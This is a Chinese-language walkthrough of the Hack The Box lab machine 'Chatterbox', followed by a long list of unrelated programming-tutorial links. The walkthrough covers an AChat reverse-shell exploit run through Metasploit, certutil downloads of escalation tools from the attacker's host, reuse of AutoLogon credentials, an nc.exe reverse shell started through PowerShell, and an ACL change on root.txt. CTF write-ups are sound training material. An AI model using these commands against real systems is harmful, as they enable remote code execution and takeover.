Chatterbox(hack the box系列)
时间:2022-07-22
本文章向大家介绍Chatterbox(hack the box系列),主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
本文作者:Twe1ve(贝塔安全实验室-核心成员)
nmap扫描结果:
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
Achat Exploit : https://www.youtube.com/watch?v=YgC_Rl6x3aM
1.生成paylaod
kali@kali:~/tools/others/AChat-Reverse-TCP-Exploit$ bash AChat_Payload.sh
RHOST: 10.10.10.74LPORT: 4444
LHOST: 10.10.14.61
2.用生成的payload替换py脚本中的payload,并修改server_address
3.msf
use exploit/multi/handler
set payload windows/shell/reverse_tcp
...
4.python AChat_Exploit.py
###得到一个用户shell,post/multi/manage/shell_to_meterpreter ###升级为meterpreter shell,此处是升级失败
msf suggest提权模块不能获取可以提权的模块使用提权脚本看一下
由于是windows 7,使用证书下载试试看
certutil.exe -urlcache -split -f http://10.10.14.61:8000/winPEAS.exe 1.exe
certutil.exe -urlcache -split -f http://10.10.14.61:8000/ms16-075.exe 2.exe
certutil.exe -urlcache -split -f http://10.10.14.61:8000/41015.exe 3.exe
.....
提权模块都失败
winPEAS:
Some AutoLogon credentials were found!!
DefaultUserName : 35mAlfred
DefaultPassword : Welcome1!
撞一下密码:(这里没想到的是这台win 7 竟然装了powershell)
$pass = convertTo-SecureString 'Welcome1!' -AsPlainText -Force
$cred= New-Object System.Management.Automation.PSCredential("Administrator",$pass)
Invoke-Command -Computer Sniper -ScriptBlock { whoami } -Credential $cred ###验证是否是正确的凭证
Invoke-Command -Computer Sniper -ScriptBlock { dir } -Credential $cred
Invoke-Command -Computer Sniper -ScriptBlock { C:ProgramDatanc.exe 10.10.15.64 9999 -e cmd.exe } -Credential $cred
另一种玩法:
####由于直接直接查看root.txt,只是拒绝用户访问,所以可以通过修改root.txt的文件权限来使它可读
cacls.exe c:usersAdministratorDesktoproot.txt /c /e /t /g Alfred:F
- 【java开发系列】—— java输入输出流
- Oracle基础知识-oracle常用命令
- 【java开发系列】—— JDK安装
- 【java开发系列】—— struts2简单入门示例
- JAVA利用poi获取world文件内容
- Oracle基础知识-数据迁移
- JAVA利用jxl读取Excel内容
- JAVA利用jxl读取Excel内容
- 【java开发系列】—— 自定义注解
- CSS 特殊属性介绍之 pointer-events
- 【java开发系列】—— 集合使用方法
- Elasticsearch安装
- 【java开发系列】—— 深克隆和浅克隆
- 【java开发系列】—— JDOM创建、修改、删除、读取XML文件
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法